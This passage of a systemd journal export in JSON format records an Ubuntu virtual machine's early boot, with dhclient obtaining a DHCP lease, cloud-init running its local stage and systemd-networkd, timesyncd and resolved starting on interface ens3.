/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPREQUEST of 192.168.10.95 on ens3 to 255.255.255.255 port 67 (xid=0x3597370f)", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784645465" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=230;b=e2b08827b5804427b422c10c84f1567e;m=9e1e64;t=5bd16dd619dcc;x=7a44fe3a0b1c8273", "__REALTIME_TIMESTAMP" : "1615280784645580", "__MONOTONIC_TIMESTAMP" : "10362468", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPOFFER of 192.168.10.95 from 192.168.10.2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784645574" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=231;b=e2b08827b5804427b422c10c84f1567e;m=9e25d3;t=5bd16dd61a53a;x=ae1b737a9207c09f", "__REALTIME_TIMESTAMP" : "1615280784647482", "__MONOTONIC_TIMESTAMP" : "10364371", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "DHCPACK of 192.168.10.95 from 192.168.10.2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784647459" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=232;b=e2b08827b5804427b422c10c84f1567e;m=9e9f06;t=5bd16dd621e6d;x=ceca2907bc6d18d2", "__REALTIME_TIMESTAMP" : "1615280784678509", "__MONOTONIC_TIMESTAMP" : "10395398", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "syslog", "SYSLOG_IDENTIFIER" : "dhclient", "SYSLOG_PID" : "576", "_PID" : "576", "_COMM" : "dhclient", "_EXE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient", "_CMDLINE" : "/var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient -1 -v -lf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhcp.leases -pf /var/tmp/cloud-init/cloud-init-dhcp-mxbfugwn/dhclient.pid ens3 -sf /bin/true", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "MESSAGE" : "bound to 192.168.10.95 -- renewal in 33503 seconds.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280784678463" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=233;b=e2b08827b5804427b422c10c84f1567e;m=2607d80;t=5bd16df23fce2;x=368d0957136c150f", "__REALTIME_TIMESTAMP" : "1615280814161122", "__MONOTONIC_TIMESTAMP" : "39878016", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_CAP_EFFECTIVE" : "3fffffffff", "_TRANSPORT" : "stdout", "_SYSTEMD_CGROUP" : "/system.slice/cloud-init-local.service", "_SYSTEMD_UNIT" : "cloud-init-local.service", "_SYSTEMD_INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_STREAM_ID" : "3a93b23a9c1d4fdab05d8cac63ea7d61", "SYSLOG_IDENTIFIER" : "cloud-init", "MESSAGE" : "Cloud-init v. 19.1-1-gbaa47854-0ubuntu1~18.04.1 running 'init-local' at Tue, 09 Mar 2021 09:06:24 +0000. Up 10.17 seconds.", "_PID" : "538", "_COMM" : "cloud-init", "_EXE" : "/usr/bin/python3.6", "_CMDLINE" : "/usr/bin/python3 /usr/bin/cloud-init init --local", "_HOSTNAME" : "test-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=234;b=e2b08827b5804427b422c10c84f1567e;m=261ff9d;t=5bd16df257f04;x=ecf128b801d4eacc", "__REALTIME_TIMESTAMP" : "1615280814259972", "__MONOTONIC_TIMESTAMP" : "39976861", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "cloud-init-local.service", "INVOCATION_ID" : "a9ab86ba486e45f69de3b4cfeefc010f", "_HOSTNAME" : "test-1", "MESSAGE" : "Started Initial cloud-init job (pre-networking).", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814256658" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=235;b=e2b08827b5804427b422c10c84f1567e;m=2620480;t=5bd16df2583e7;x=6dd0ca85e60b6cf7", "__REALTIME_TIMESTAMP" : "1615280814261223", "__MONOTONIC_TIMESTAMP" : "39978112", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "MESSAGE" : "Reached target Network (Pre).", "UNIT" : "network-pre.target", "INVOCATION_ID" : "b8f3685ee1a74adbac358b94e5d6fe6e", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814261197" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=236;b=e2b08827b5804427b422c10c84f1567e;m=2621764;t=5bd16df2596cb;x=f92c1cdfdc0c1137", "__REALTIME_TIMESTAMP" : "1615280814266059", "__MONOTONIC_TIMESTAMP" : "39982948", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Network Service...", "UNIT" : "systemd-networkd.service", "INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814266037" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=237;b=e2b08827b5804427b422c10c84f1567e;m=263a172;t=5bd16df2720d8;x=c41f1c6c3213eaa3", "__REALTIME_TIMESTAMP" : "1615280814366936", "__MONOTONIC_TIMESTAMP" : "40083826", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "CODE_FILE" : "../src/network/networkd.c", "CODE_LINE" : "152", "CODE_FUNC" : "main", "SYSLOG_IDENTIFIER" : "systemd-networkd", "MESSAGE" : "Enumeration completed", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814366926" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=238;b=e2b08827b5804427b422c10c84f1567e;m=263b01f;t=5bd16df272f86;x=d6a27a130ebbab0d", "__REALTIME_TIMESTAMP" : "1615280814370694", "__MONOTONIC_TIMESTAMP" : "40087583", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_HOSTNAME" : "test-1", "UNIT" : "systemd-networkd.service", "INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "MESSAGE" : "Started Network Service.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814367603" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=239;b=e2b08827b5804427b422c10c84f1567e;m=263b0df;t=5bd16df273047;x=cb21fbb4e8b86f83", "__REALTIME_TIMESTAMP" : "1615280814370887", "__MONOTONIC_TIMESTAMP" : "40087775", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "CODE_LINE" : "3431", "CODE_FUNC" : "link_update", "INTERFACE" : "ens3", "MESSAGE" : "ens3: Gained carrier", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814370880" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23a;b=e2b08827b5804427b422c10c84f1567e;m=263b942;t=5bd16df2738a9;x=1e97fceaacf3cfab", "__REALTIME_TIMESTAMP" : "1615280814373033", "__MONOTONIC_TIMESTAMP" : "40089922", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Wait for Network to be Configured...", "UNIT" : "systemd-networkd-wait-online.service", "INVOCATION_ID" : "2f779d5a71cf4429aa193a78ff1c5862", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814371365" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23b;b=e2b08827b5804427b422c10c84f1567e;m=263bc5c;t=5bd16df273bc4;x=7f61a6b98bd750de", "__REALTIME_TIMESTAMP" : "1615280814373828", "__MONOTONIC_TIMESTAMP" : "40090716", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_FACILITY" : "9", "CODE_FILE" : "../src/timesync/timesyncd-manager.c", "CODE_LINE" : "1070", "CODE_FUNC" : "manager_network_event_handler", "SYSLOG_IDENTIFIER" : "systemd-timesyncd", "MESSAGE" : "Network configuration changed, trying to establish connection.", "_PID" : "501", "_UID" : "62583", "_GID" : "62583", "_COMM" : "systemd-timesyn", "_EXE" : "/lib/systemd/systemd-timesyncd", "_CMDLINE" : "/lib/systemd/systemd-timesyncd", "_CAP_EFFECTIVE" : "2000000", "_SYSTEMD_CGROUP" : "/system.slice/systemd-timesyncd.service", "_SYSTEMD_UNIT" : "systemd-timesyncd.service", "_SYSTEMD_INVOCATION_ID" : "02dc978d5d9147908ffca7c0020b3270", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814373715" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23c;b=e2b08827b5804427b422c10c84f1567e;m=263be97;t=5bd16df273dfe;x=34004f7e7f9e3d76", "__REALTIME_TIMESTAMP" : "1615280814374398", "__MONOTONIC_TIMESTAMP" : "40091287", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "3163", "CODE_FUNC" : "link_ipv6ll_gained", "MESSAGE" : "ens3: Gained IPv6LL", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814374391" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23d;b=e2b08827b5804427b422c10c84f1567e;m=263bf93;t=5bd16df273efa;x=a5c3a6ccbdc3e536", "__REALTIME_TIMESTAMP" : "1615280814374650", "__MONOTONIC_TIMESTAMP" : "40091539", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "CODE_FUNC" : "link_update", "INTERFACE" : "ens3", "CODE_LINE" : "3437", "MESSAGE" : "ens3: Lost carrier", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814374644" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23e;b=e2b08827b5804427b422c10c84f1567e;m=263cc6e;t=5bd16df274bd6;x=d585f0cc41c21d03", "__REALTIME_TIMESTAMP" : "1615280814377942", "__MONOTONIC_TIMESTAMP" : "40094830", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-dhcp6.c", "CODE_LINE" : "40", "CODE_FUNC" : "dhcp6_verify_link", "INTERFACE" : "lo", "MESSAGE" : "lo: Link is not managed by us", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814377900" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=23f;b=e2b08827b5804427b422c10c84f1567e;m=263d92b;t=5bd16df275892;x=e4cb284037fe65d3", "__REALTIME_TIMESTAMP" : "1615280814381202", "__MONOTONIC_TIMESTAMP" : "40098091", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_HOSTNAME" : "test-1", "MESSAGE" : "Starting Network Name Resolution...", "UNIT" : "systemd-resolved.service", "INVOCATION_ID" : "5693a666065f4cca8576cd5ba35dba68", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814379434" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=240;b=e2b08827b5804427b422c10c84f1567e;m=263db29;t=5bd16df275a91;x=9e4386d1737efb05", "__REALTIME_TIMESTAMP" : "1615280814381713", "__MONOTONIC_TIMESTAMP" : "40098601", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "INTERFACE" : "ens3", "CODE_LINE" : "294", "CODE_FUNC" : "link_enable_ipv6", "MESSAGE" : "ens3: IPv6 successfully enabled", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814381705" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=241;b=e2b08827b5804427b422c10c84f1567e;m=264161f;t=5bd16df279586;x=b55c09cf1a27986a", "__REALTIME_TIMESTAMP" : "1615280814396806", "__MONOTONIC_TIMESTAMP" : "40113695", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-link.c", "CODE_LINE" : "3431", "CODE_FUNC" : "link_update", "INTERFACE" : "ens3", "MESSAGE" : "ens3: Gained carrier", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814396796" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=242;b=e2b08827b5804427b422c10c84f1567e;m=26427f7;t=5bd16df27a75e;x=a6141f99eec106dd", "__REALTIME_TIMESTAMP" : "1615280814401374", "__MONOTONIC_TIMESTAMP" : "40118263", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "INTERFACE" : "ens3", "CODE_FILE" : "../src/network/networkd-dhcp4.c", "CODE_LINE" : "463", "CODE_FUNC" : "dhcp_lease_acquired", "MESSAGE" : "ens3: DHCPv4 address 192.168.10.95/24 via 192.168.10.1", "ADDRESS" : "192.168.10.95", "PREFIXLEN" : "24", "GATEWAY" : "192.168.10.1", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814401328" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=243;b=e2b08827b5804427b422c10c84f1567e;m=2642895;t=5bd16df27a7fd;x=45c1cf1e9fb525a9", "__REALTIME_TIMESTAMP" : "1615280814401533", "__MONOTONIC_TIMESTAMP" : "40118421", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", "SYSLOG_IDENTIFIER" : "systemd-networkd", "_PID" : "600", "_UID" : "100", "_GID" : "102", "_COMM" : "systemd-network", "_EXE" : "/lib/systemd/systemd-networkd", "_CMDLINE" : "/lib/systemd/systemd-networkd", "_CAP_EFFECTIVE" : "3c00", "_SYSTEMD_CGROUP" : "/system.slice/systemd-networkd.service", "_SYSTEMD_UNIT" : "systemd-networkd.service", "_SYSTEMD_INVOCATION_ID" : "14f7386a2cc943d49c3ae6bf27d211fe", "CODE_FILE" : "../src/network/networkd-manager.c", "CODE_LINE" : "1780", "CODE_FUNC" : "manager_set_hostname", "MESSAGE" : "Not connected to system bus, not setting hostname.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280814401352" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=244;b=e2b08827b5804427b422c10c84f1567e;m=2642c5f;t=5bd16df27abc6;x=25d6a409bd6c4b00", "__REALTIME_TIMESTAMP" : "1615280814402502", "__MONOTONIC_TIMESTAMP" : "40119391", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "PRIORITY" : "6", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_HOSTNAME" : "test-1", 